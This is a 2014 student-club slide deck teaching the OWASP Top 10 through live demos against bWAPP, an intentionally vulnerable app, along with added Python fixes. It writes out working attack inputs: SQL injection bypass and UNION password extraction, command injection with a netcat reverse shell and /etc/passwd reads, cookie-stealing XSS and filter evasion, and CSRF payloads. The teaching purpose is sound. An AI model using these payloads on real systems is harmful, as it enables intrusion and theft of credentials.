ACM SIG Security November 18, 2014
Why Talk About Software Security?
Free Pizza
Software is Everywhere (Pervasive)
All computer security problems are software security problems
Even if you don't go into security work, understand the concepts.

About Me
Tim MalcomVetter
Spent too much time in school: BA Sociology, SBU; BA Computer Science, UMKC; MS Information Assurance, Norwich University; S&T PhD Student (until work + PhD + kids + sleep > 24 hours/day)
Former SIG-SEC member
Software Developer: C#, Java, JavaScript, C/C++, Python, Perl, SQL, BASH, PHP, etc.
Alphabet Soup: CISSP and other certifications
Security Consultant, FishNet Security

About FishNet Security
Founded 1996
Nation's #1 Security Provider
Tremendous Company Growth: Revenue, Profit, Employees
Based out of Kansas City (Overland Park)
Consultants all over the country (Work from home!)
Fortune 500 clients
Speakers at Blackhat, DefCon, etc.

FishNet Security is Hiring!
If this talk interests you (or if other security topics are interesting), join the largest growing team of security professionals!
Junior Consultant Program: to bring in more new talent and solve the chicken and egg problem

Overview
✓ Pizza
✓ Intros
Obligatory Legal Warning
Software Security Concepts
Tools
OWASP Top 10 (With Live Examples; You can play too)
OWASP's Mobile Top 10
XKCD Appreciation (Sprinkled Throughout)

Quick Poll
Who here has actually hacked a computer system or application?
Who here has observed somebody else hacking a system?
Who has NEVER done or seen it firsthand?

Obligatory Legal Disclaimer
Hacking your own stuff is (probably) not a crime
Unauthorized access to others' computers IS a Federal Felony or Misdemeanor
Get your authorization IN WRITING
Ask me how I know, offline
It's no fun to be on the receiving end of an FBI misunderstanding. Ask me how I... nevermind.
When all else fails, hire a good lawyer

Software Security Concepts: What's Old is New
Problems are literally as old as the first systems (1960s/1970s)
Network Security == Software listening on network ports
Don't need firewalls; need CORRECT software design & implementation
Input Vectors == Attack Vectors
Security Software != Secure Software
Security Features != Secure Software

Software Security Concepts
2001: Attack a Microsoft Service; 1 vuln, exploit many targets; 0day: 1 average hacker, 1 work week
2007: Attack a Custom Web Application; harder to find vulns in commercial apps
2014: Blended attacks (web/mobile/services); 0day: Team of 5-6 hackers, 1 work month

Testing Tools: Web Apps
Burp Suite (There's a Free Edition): http://portswigger.net/
Browser Developer Tools/Console
Python, Ruby, C#, Java
I don't personally rely on automated scanners: false positives; noisy, potentially disruptive
Scanning/Fuzzing is supplementary/code coverage

Testing Tools: Mobile
Burp! Proxy mobile traffic
SQLite: read database files
iOS: iExplorer, iFunbox; jailbroken devices
Android: SDK/Eclipse; ADB (Android Debug Bridge); Java decompilers/disassemblers; rooted devices

Demo Tools
We are going to play with an intentionally vulnerable web app: bWAPP
Also comes as a pre-configured VM with OS vulnerabilities
Download for yourself to learn more: http://www.itsecgames.com/

OWASP Top 10
OWASP == Consortium to improve Software Security
Top 10 == List of Most Common Software Security Defects
De facto Gold Standard
Good for security professionals to know
Even better for developers to know!

OWASP Top 10 2013
1. (SQL, OS, Cmd) Injection
2. Authentication/Session Management
3. XSS
4. Direct Object References
5. Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. CSRF
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects/Forwards

A1: Injection
From OWASP: Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Remember: Input Vectors are Attack Vectors

A1: Injection
Cross Site Scripting (XSS) is really another form of injection: HTML/JS Injection

A1: Injection
All Injection attacks can be thwarted by judicious use of input validation.

A1: Injection
SQL Injection is becoming more and more rare (which is a good thing)
Likely because of: better development frameworks, tools, libraries; layers of security (server, language, code); developer awareness
Our demo example is likely more simplistic than you will see in the wild

A1: Injection C# Example
Which is vulnerable?
    // Both statements splice the untrusted itemid straight into the SQL text.
    Database database = DatabaseFactory.CreateDatabase();
    string sql1 = "SELECT * from itemtable where itemid = " + itemid;
    string sql2 = string.Format("select * from itemtable where itemid = {0}", itemid);
    DbCommand command1 = database.GetSqlStringCommand(sql1);
    DbCommand command2 = database.GetSqlStringCommand(sql2);
Answer: Both!

A1: Injection C# Example
And the fix: Parameterized SQL Queries
    var database = DatabaseFactory.CreateDatabase();
    // itemid is bound as a typed parameter and never becomes part of the query text.
    const string sql = "SELECT * from itemtable where itemid = @itemid";
    var command = database.GetSqlStringCommand(sql);
    database.AddInParameter(command, "@itemid", DbType.Int32, itemid);

A1: Injection
Stored Procedures are not "Magically Safe":
    CREATE PROCEDURE SP_Search @name varchar(400) = NULL AS
    DECLARE @sql nvarchar(4000)
    -- @name is still concatenated into dynamic SQL, so the procedure is just as injectable
    SELECT @sql = 'SELECT * FROM [People] WHERE [Name] LIKE ''' + @name + ''''
    EXEC (@sql)

A1: Other forms of Injection
These are not as common as SQL Injection
LDAP Injection: when user input is unintentionally interpreted as an LDAP (directory) query. Sanitize input (similar to SQLi/XSS) and use safe APIs
Command Injection: more common with PHP/Perl/CGI, Open Source/LAMP. When user input is unintentionally interpreted as an OS/shell command:
    exec("some_command user $userid pass $pass");
XML/XPath Injection

A1: SQL Injection Live Demo
http://localhost/bwapp/sqli_3.php
alice / lovezombies
alice / '
alice / ' --
alice / ' or 1=1 --
' or 'a'='a' --

A1: SQL Injection Live Demo: Extract Data!
http://localhost/bwapp/sqli_1.php
http://localhost/bwapp/sqli_1.php?title=%27
http://localhost/bwapp/sqli_1.php?title=blah'+or+1=1--%20
http://localhost/bwapp/sqli_1.php?title=blah'+union+select+1--%20
http://localhost/bwapp/sqli_1.php?title=blah%27+union+select+1,1,1,1,1,1,1--%20
http://localhost/bwapp/sqli_1.php?title=blah%27+union+select+1,DATABASE%28%29,2,3,4,5,6--%20
http://localhost/bwapp/sqli_1.php?title=blah%27+union+select+1,column_name,2,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=%27users%27+and+table_schema=database%28%29--%20
http://localhost/bwapp/sqli_1.php?title=blah%27+union+select+1,login,password,email,secret,1,2+from+users--%20

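The sqli_3.php login bypass and the sqli_1.php UNION extraction from the two demo slides, replayed against an in-memory SQLite database with the concatenating query next to its parameterized fix. This is an added example written for these notes, not bWAPP's code; the tables, rows and column layout are constructed, only the payload strings come from the slides.

```python
import sqlite3

# Constructed stand-ins for bWAPP's users and movies tables.
SAMPLE_USERS = [(1, "alice", "lovezombies", "alice@example.invalid", "constructed-secret")]
SAMPLE_MOVIES = [(1, "Zombieland", 2009), (2, "World War Z", 2013)]


def make_db():
    """In-memory SQLite database holding the constructed rows above."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, login TEXT, password TEXT, email TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    con.execute("CREATE TABLE movies(id INTEGER, title TEXT, year INTEGER)")
    con.executemany("INSERT INTO movies VALUES (?, ?, ?)", SAMPLE_MOVIES)
    return con


def login_vulnerable(con, login, password):
    # sqli_3.php style: values are glued into the SQL text, so a password of
    # ' or 1=1 -- closes the literal, ORs in a true condition and comments out the rest.
    sql = ("SELECT login FROM users WHERE login = '" + login
           + "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(sql)]


def login_parameterized(con, login, password):
    # The fix from the C# slide, in Python: bound parameters travel separately
    # from the SQL text, so the same string is just a wrong password.
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (login, password))]


def search_vulnerable(con, title):
    # sqli_1.php style: a UNION in the title parameter makes the movie search
    # return rows from a table the page never meant to expose.
    sql = "SELECT id, title, year FROM movies WHERE title = '" + title + "'"
    return con.execute(sql).fetchall()


def search_parameterized(con, title):
    sql = "SELECT id, title, year FROM movies WHERE title = ?"
    return con.execute(sql, (title,)).fetchall()
```
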
A1: Command Injection Live Demo
http://localhost/bwapp/commandi.php
www.nsa.gov
Concatenate commands: www.nsa.gov; cat /etc/passwd
Netcat reverse shell: attacker's shell: nc -lvp 9999
www.nsa.gov; nc -e /bin/sh 127.0.0.1 9999
id
cat /etc/passwd

A1: C# Command Injection Example
    // All three values come straight from the request and are handed to Process.
    private string Command { get { return TextBoxCmd.Text; } }
    private string Args { get { return Request.Form["args"]; } }
    private string Directory { get { return Request.QueryString["dir"]; } }
    var process = new System.Diagnostics.Process();
    process.StartInfo.FileName = Command;
    process.StartInfo.Arguments = Args;
    process.StartInfo.UseShellExecute = false;        // required for RedirectStandardOutput
    process.StartInfo.RedirectStandardOutput = true;
    process.StartInfo.WorkingDirectory = Directory;
    process.Start();
    var output = process.StandardOutput.ReadToEnd();

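The commandi.php pattern from the demo (a DNS lookup of a user-supplied host) written once as a shell string and once with the value validated against a hostname whitelist and passed as a single argv element, so no shell ever parses it. Added example for these notes, not bWAPP's or the C# slide's code; the nslookup command and the tokenizer helper are assumptions.

```python
import re
import shlex
import subprocess

# Whitelist for one DNS name: labels of letters, digits and hyphens joined by dots.
# ';', '|', '&', spaces and quotes cannot match, so they never reach a shell.
LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(r"^" + LABEL + r"(\." + LABEL + r")*$")


def is_valid_host(value):
    return len(value) <= 253 and HOSTNAME_RE.match(value) is not None


def shell_command_vulnerable(host):
    # What the vulnerable page effectively does: one string handed to a shell.
    return "nslookup " + host


def shell_commands(cmdline):
    """Tokenize a command line the way a POSIX shell would and return the
    separate commands it would run (split at ; | & && ||)."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lex:
        if tok in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def lookup_argv(host):
    # Validate against the whitelist first, then build an argv list: the host is
    # one argument and nothing re-parses it for ';' or '|'.
    if not is_valid_host(host):
        raise ValueError("rejected, not a hostname: %r" % host)
    return ["nslookup", host]


def run_lookup(host):
    # A list with the default shell=False; this call is not exercised by the checks.
    return subprocess.run(lookup_argv(host), capture_output=True, text=True, timeout=10).stdout
```
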
A2: Broken Authentication & Session Management
From OWASP: Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.

A2: More than just Strong Passwords

A2: Broken Authentication & Session Management
Watch for:
Sensitive cookies sent over HTTP
Missing Secure flag
Session IDs not random or not changing at logon
Sessions never expiring
Session expiration logic implemented on the client in JavaScript (bypass that!)
Force browse to Admin/Authenticated URLs
Login forms sent over HTTP!

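A small audit over one login exchange for the items in the list above: login URL scheme, Secure and HttpOnly flags, session ID rotation at logon, and a crude entropy floor for the ID itself. Added example for these notes (not bWAPP's code); the cookie headers, URLs and the 64-bit threshold are constructed sample values.

```python
import math
from collections import Counter
from urllib.parse import urlsplit


def parse_set_cookie(header):
    """'name=value; Secure; HttpOnly; Path=/' -> (name, value, {attr: val})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def entropy_bits(value):
    """Shannon entropy of the observed characters times the length: a crude
    lower bound that flags short or low-variety session identifiers."""
    if not value:
        return 0.0
    n = len(value)
    per_char = -sum(c / n * math.log2(c / n) for c in Counter(value).values())
    return per_char * n


def audit_session(login_url, cookie_before_login, cookie_after_login, min_bits=64):
    """Return the A2 findings for one login exchange as a list of strings."""
    findings = []
    if urlsplit(login_url).scheme != "https":
        findings.append("login form sent over HTTP")
    name_before, id_before, _ = parse_set_cookie(cookie_before_login)
    name_after, id_after, attrs = parse_set_cookie(cookie_after_login)
    if "secure" not in attrs:
        findings.append("session cookie missing Secure flag")
    if "httponly" not in attrs:
        findings.append("session cookie missing HttpOnly flag")
    if name_before == name_after and id_before == id_after:
        findings.append("session ID not changed at logon")   # fixation risk
    if entropy_bits(id_after) < min_bits:
        findings.append("session ID too predictable")
    return findings


# Constructed sample exchanges, the kind of thing Burp shows during the demo.
WEAK = ("http://localhost/bwapp/login.php",
        "PHPSESSID=abc123; Path=/",
        "PHPSESSID=abc123; Path=/")
STRONG = ("https://localhost/bwapp/login.php",
          "PHPSESSID=7c1e3f9a5b2d8e04a6c9f1b7d3e5a8c2; Path=/",
          "PHPSESSID=0f4e9b7a2c6d1e8f3a5b9c7d2e4f6a1b; Path=/; Secure; HttpOnly")
```
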
A2: Auth/Session Live Demo!
http://localhost/bwapp/smgmt_admin_portal.php?admin=0
http://localhost/bwapp/ba_logout.php
Steal the Session Cookie!

A3: Cross Site Scripting (XSS)
From OWASP: XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A3: Cross Site Scripting
Hint: Next slide makes a good interview question!

A3: Cross Site Scripting (XSS)
Three main categories of XSS:
1) Reflected XSS: an exploit is served up immediately through a vulnerability in an application's page.
2) Persisted (Stored) XSS: an exploit is delivered to the application, persisted (typically in SQL), and then served up to a victim (or usually victims) at a later point in time.
3) DOM XSS: an exploit is delivered to client side JavaScript which renders and executes it within the DOM, not necessarily requiring a round-trip to the server.

A3: Cross Site Scripting (XSS)
Declining, but not gone
Typical current examples require bypassing filters
Really just another form of Injection: inject HTML/JS into an app

A3: Cross Site Scripting (XSS)
Blacklist vs Whitelist: Whitelist is better, but often harder to know
EASY BUTTON: HtmlEncode() when writing user input to the browser
Don't forget Query String or Cookie Params! All input vectors are...?
Use libraries to make this automatic!

A3: Cross Site Scripting (XSS)
Whitelists == Regular Expressions

A3: XSS Example ASP.NET
    // Three input vectors (form/query/cookie), all written to the page unencoded.
    SomeLabel.Text = Request["Name"];
    SomeLabel.Text = Request.QueryString["Name"];
    SomeLabel.Text = Request.Cookies["Cookie"].Value;
All Vulnerable!

A3: XSS Example ASP.NET
    string Name { get { return Server.HtmlEncode(Textbox1.Text); } }
    SomeLabel.Text = "Welcome " + Name;
Vulnerable?

A3: XSS Example MVC View C#
    <div class="MyContent">
        <%= Model.Content1 %>
        <%: Model.Content2 %>
        <%= Server.HtmlEncode(Model.Content3) %>
        <%= Html.TextBoxFor(model => model.Content4) %>
        <%: Html.TextBoxFor(model => model.Content5) %>
        <%= Html.Raw(Model.Content6) %>
    </div>
Which content may be vulnerable to XSS? Hint: IHtmlString

A3: XSS Example MVC View JS
    <script type="text/javascript">
    $(function () {
        var orderid = '<%= ViewData["orderId"] %>';
        $('#orderid').hide().html(orderid).show('slow');
        var actorid = '<%= ViewData["actorid"] %>';
        $('#actorid').hide().text(actorid).show('slow');
    });
    </script>
Vulnerable? Hint: .html()

A3: Reflected XSS Demo!
http://localhost/bwapp/htmli_post.php
Joe Schmoe<script>alert('xss')</script>
Joe Schmoe<script>document.location='http://www.google.com/?q='+document.cookie</script>
http://localhost/bwapp/htmli_get.php?firstname=joe&lastname=schmoe%3cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

A3: Persisted (Stored) XSS Demo!
http://localhost/bwapp/htmli_stored.php
    <script>var c=document.cookie.replace(" ","+"); document.write("what about this? <img src=http://www.google.com/?q="+c);</script>

A3: XSS Filter Evasion
<scr<script>ipt>alert(0)</scr</script>ipt>
<ScRiPt>alert(0)</sCrIpT>
<img src=# onmouseover="alert(0)">
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

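The htmli_post.php name fields handled three ways, to show why the blacklist loses to the three evasion strings above while the "easy button" (encode on output) and a whitelist regular expression do not: a one-pass strip of <script>, HTML encoding at the sink, and a name whitelist in front of it. Added example for these notes, not bWAPP's code; the name pattern and the Welcome markup are assumptions.

```python
import html
import re

# Whitelist for a person's name: a letter, then letters, spaces, apostrophes,
# dots and hyphens. Angle brackets, quotes and '=' can never match.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' .-]{0,49}$")


def blacklist_filter(value):
    # A typical home-grown filter: one pass, case-sensitive removal of <script>.
    # Nested tags, mixed case and event handler attributes all survive it.
    return value.replace("<script>", "").replace("</script>", "")


def render_with_blacklist(first, last):
    return "<p>Welcome " + blacklist_filter(first) + " " + blacklist_filter(last) + "</p>"


def render_encoded(first, last):
    # The "easy button": encode each untrusted value where it is written into HTML
    # text. The browser displays < > ' " & as characters and never parses them.
    return "<p>Welcome " + html.escape(first) + " " + html.escape(last) + "</p>"


def is_valid_name(value):
    return NAME_RE.match(value) is not None


def render_whitelisted(first, last):
    # Reject input that is not a plausible name, and still encode on output:
    # validation at the edge plus encoding at the sink.
    if not (is_valid_name(first) and is_valid_name(last)):
        raise ValueError("invalid name")
    return render_encoded(first, last)
```
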
A4: Insecure Direct Object References
From OWASP: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A4: Insecure Direct Object Example
    public int GenerateAwardNumber()
    {
        var prev = GetPreviousIssuedAwardNumber();
        return prev + 1;   // sequential: the next award number is trivially guessable
    }
Vulnerable to Forced Browsing (guessing IDs)

A4: Insecure Direct Object Example
Directory listing of web root:
ForgotPassword.aspx
Default.aspx
Login.jsp
/Admin
Passwords.txt
Vulnerable to Forced Browsing (guessing URLs)

A4: Insecure Direct Object Anecdote
From a client engagement this past summer
URL encoded parameter like /viewreport.aspx?u=%5c%5cserver%5cshare%5cfile.pdf
Decodes as: \\server\share\file.pdf
How about this instead? /viewreport.aspx?u=c%3a%5cinetpub%5cwwwroot%5cweb.config
I made the app give me all source .aspx pages + all compiled DLLs referenced by .aspx pages + config!
Reflected the .NET DLLs to C# source
Pwned all source + time == found more vulns in code!

A4: Direct Object Reference Live Demo!
http://localhost/bwapp/insecure_direct_object_ref_2.php

A5: Security Misconfiguration
From OWASP: Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

A5: Security Misconfiguration
It happens. Read the manual. bWAPP has examples.

A6: Sensitive Data Exposure
From OWASP: Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A6: Sensitive Data Exposure
Use HTTPS
Use a well designed/reviewed Crypto API, or be careful and:
Use industry accepted algorithms
Use industry accepted key lengths
Salt your hashes
What's your Initialization Vector, Victor?
Who has access to the keys?

A6: Sensitive Data Exposure
Turn on HTTPS
Use good (strong and non-expired) certificates
Once you go HTTPS, don't revert to HTTP
All objects in the page should use HTTPS

A6: Sensitive Data Solutions
Or better yet: do you have to keep that sensitive data?
Not processing/storing sensitive data is a VALID option
Credit Card Tokenization

A6: Sensitive Data Exposure
The main benefit to encrypting sensitive values in the DB is for another layer against SQL Injection.
UserID: jon' union select ExpirationMonth, Number, FullName from CreditCard where ExpirationYear = '2012' --
If Number is encrypted, this SQL Injection attack has less bite
When the application accesses the Number, decryption happens in application layer code with a key the attacker doesn't have.

A6: Sensitive Data Exposure
Remember: Don't roll your own Security Features
Remember: Don't roll your own Crypto

A7: Missing Function Level Access Control
From OWASP: Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

A7: Missing Function Level Access Control
Never assume a user is authenticated!
Corollary: Always check for authentication
    if (user.IsAuthenticated()) { }
Validation Rule #1: Validate on the Client for UX
Validation Rule #2: Validate on the Server for Security
Especially important in Services, AJAX

A7: Missing Function Level Access Control
Another recent client anecdote
Modern web app leverages RESTful/JSON services
User login form sends credentials over HTTPS to service
Service responds with results in JSON format
All access control was written on the CLIENT in JavaScript!
Simply proxy the server response, edit with "Yes I am the Administrator"
The client side JS took care of the rest.

A8: Cross Site Request Forgery (CSRF)
From OWASP: A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
Dropped from #5 in 2010

A8: Cross Site Request Forgery (CSRF)
Pronounced "Sea-Surf"
One of the hardest attack models to understand
I find this one OFTEN, and even in Commercial Web Application Products
Often combined with XSS (client side script to force the victim's browser to do something)

A8: CSRF Solutions
Sensitive Transactions should not use GET
Note: Sensitive Transactions via POST can still be exploited with combined XSS
Use a library that will handle adding nonces to your forms. NONCE == Number used ONCE
MVC: Anti-Forgery Tokens
A random number token that is temporarily persisted in session/state/memory/disk on the server and added as a hidden form parameter:
    <input type="hidden" name="validator" value="982743660152">

A8: CSRF Solutions - Nonces
MVC's Anti-Forgery Token HTML:
    @using (Html.BeginForm("Manage", "Account"))
    {
        @Html.AntiForgeryToken()
    }

A8: MVC Anti-Forgery Tokens
With AJAX:

A8: MVC Anti-Forgery Tokens
Validation:

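The nonce scheme the CSRF Solutions slides describe (a random token kept server-side, emitted as a hidden form field, checked and consumed on POST), written out as a synchronizer-token pattern in Python rather than MVC's own anti-forgery helper. Added example for these notes; the dict standing in for session state, the form action and the "secret" field are constructed.

```python
import hmac
import html
import secrets

TOKEN_FIELD = "validator"   # the hidden field name used on the slide
TOKEN_BYTES = 32            # 256 bits of randomness per nonce


def issue_token(session):
    # A fresh random nonce per form render, remembered only on the server.
    token = secrets.token_urlsafe(TOKEN_BYTES)
    session.setdefault("csrf_tokens", set()).add(token)
    return token


def render_form(session, action="/account/manage"):
    # The token travels in a hidden input, not in a cookie, so a forged
    # cross-site request cannot include it automatically.
    token = issue_token(session)
    return ('<form method="post" action="%s">'
            '<input type="hidden" name="%s" value="%s">'
            '<input type="text" name="secret"><input type="submit">'
            '</form>' % (html.escape(action), TOKEN_FIELD, html.escape(token)))


def validate_token(session, form):
    """True if the POST carries an outstanding nonce; the nonce is then spent."""
    supplied = form.get(TOKEN_FIELD, "").encode()
    issued = session.get("csrf_tokens", set())
    # Constant-time comparison against each outstanding token, then invalidate
    # the one that matched: Number used ONCE.
    for token in list(issued):
        if hmac.compare_digest(token.encode(), supplied):
            issued.discard(token)
            return True
    return False


def handle_change_secret(session, form):
    # The state-changing handler: reject first, act second.
    if not validate_token(session, form):
        return 403, "forged request rejected"
    session["secret"] = form.get("secret", "")
    return 200, "secret changed"
```

As the slide notes, this stops the cross-site POST but not a script already injected into the page, which can read the hidden field and submit it.
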
A8: CSRF Live Demo!
http://localhost/bwapp/csrf_1.php
http://localhost/bwapp/csrf_2.php
Combine with XSS! http://localhost/bwapp/htmli_stored.php
    <script>document.write("thanks for making a donation! <img src=/bwapp/csrf_2.php?account=123-45678-90&amount=500&action=transfer");</script>

A8: CSRF Live POST Demo!
http://localhost/bwapp/csrf_3.php
http://localhost/bwapp/htmli_stored.php
Secrets are changed!
    <script>
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/bwapp/csrf_3.php', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onload = function () {
        // do something with the response
        console.log(this.responseText);
    };
    xhr.send('secret=shhh&login=bee&action=change');
    </script>

A9: Using Known Vulnerable Components
From OWASP: Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.

A9: Using Known Vulnerable Components
Keep libraries up to date
Track old stuff that needs updating as Technical Debt
Wrap 3rd party libraries to help migration to new/different libraries in the future

A10: Unvalidated Redirects and Forwards
From OWASP: Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

A10: Redirect Live Demo!
http://localhost/bwapp/unvalidated_redir_fwd_1.php
http://localhost/bwapp/unvalidated_redir_fwd_1.php?url=http%3a%2F%2Fwww.google.com
http://localhost/bwapp/unvalidated_redir_fwd_2.php?ReturnUrl=portal.php

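A validation routine for the url/ReturnUrl parameters in the demo above: it keeps same-site relative paths such as portal.php and sends anything with a scheme, a host, a protocol-relative prefix or a backslash to a fixed landing page. Added example for these notes, not bWAPP's code; the site origin and the default landing page are constructed.

```python
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://app.example.invalid"   # constructed site origin
DEFAULT_LANDING = "/portal.php"              # where a rejected value sends the user


def safe_redirect_target(param):
    """Map a user-supplied url/ReturnUrl value to a same-site path, or the default."""
    if not param or "\r" in param or "\n" in param:
        return DEFAULT_LANDING               # empty, or a header-injection attempt
    parts = urlsplit(param)
    # A scheme (http:, javascript:) or a host (from //host or http://host) means the
    # value points off-site: exactly the phishing redirect the slide describes.
    if parts.scheme or parts.netloc:
        return DEFAULT_LANDING
    # Some browsers read a backslash as a slash, so "/\evil" would become "//evil".
    if "\\" in param:
        return DEFAULT_LANDING
    # Resolve against our own origin and confirm the result still lives there.
    resolved = urlsplit(urljoin(APP_ORIGIN + "/", param))
    if resolved.netloc != urlsplit(APP_ORIGIN).netloc:
        return DEFAULT_LANDING
    return resolved.path + ("?" + resolved.query if resolved.query else "")
```
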
OWASP Recap
1. (SQL, OS, Cmd) Injection
2. Authentication/Session Management
3. XSS
4. Direct Object References
5. Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. CSRF
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects/Forwards

OWASP Mobile Top 10
1. Weak Server Side Controls
2. Insecure Data Storage
3. Insufficient Transport Layer Protection
4. Unintended Data Leakage
5. Poor Authorization and Authentication
6. Broken Cryptography
7. Client Side Injection
8. Security Decisions via Untrusted Inputs
9. Improper Session Handling
10. Lack of Binary Protections
https://www.owasp.org/index.php/projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

OWASP Mobile Top 10 #1: Weak Server Side Controls
All the stuff we just talked about (OWASP's regular Top 10)

OWASP Mobile Top 10 #2: Insecure Data Storage
Users can manipulate the device's file system

OWASP Mobile Top 10 #3: Insufficient Transport Layer Protection
Use TLS/SSL just like everything else

OWASP Mobile Top 10 #4: Unintended Data Leakage
Logging
Caching
HTML5 storage
Buffers (Copy/Paste)
Key Presses
3rd Party Analytics

OWASP Mobile Top 10 #5: Poor Authorization and Authentication
Match the web app
Consider stolen device scenarios
Convenience vs. Security ("remember me")

OWASP Mobile Top 10 #6: Broken Crypto
Don't roll your own
Remember #2: users can access keys on the file system
And no, compiling the key into the binary does not hide it.

OWASP Mobile Top 10 #7: Client Side Injection
SQL Injection on the client (SQLite)
Local File Inclusion or Command Injection
XSS/JS if mobile app is based on HTML (and most are)
Buffer Overflows: yep, what's old is new again

OWASP Mobile Top 10 #8: Security Decisions via Untrusted Inputs
iOS IPC (Inter Process Communication)
Input Vectors are...?

OWASP Mobile Top 10 #9: Improper Session Handling
Same as with web apps:
Timeouts
Invalidate on the server, not just the client
Rotate cookies upon authentication
Protect session data

OWASP Mobile Top 10 #10: Lack of Binary Protections
Good luck with this one
Make disassembly difficult
Encrypted app code (iOS)
Code obfuscation (packing)
Crypto checksums (probably not effective)
Jailbreak/Debug detection (just a speed bump)

Questions?
malcomvetter _shift2_ gmail.com
tim.malcomvetter _shift2_ fishnetsecurity.com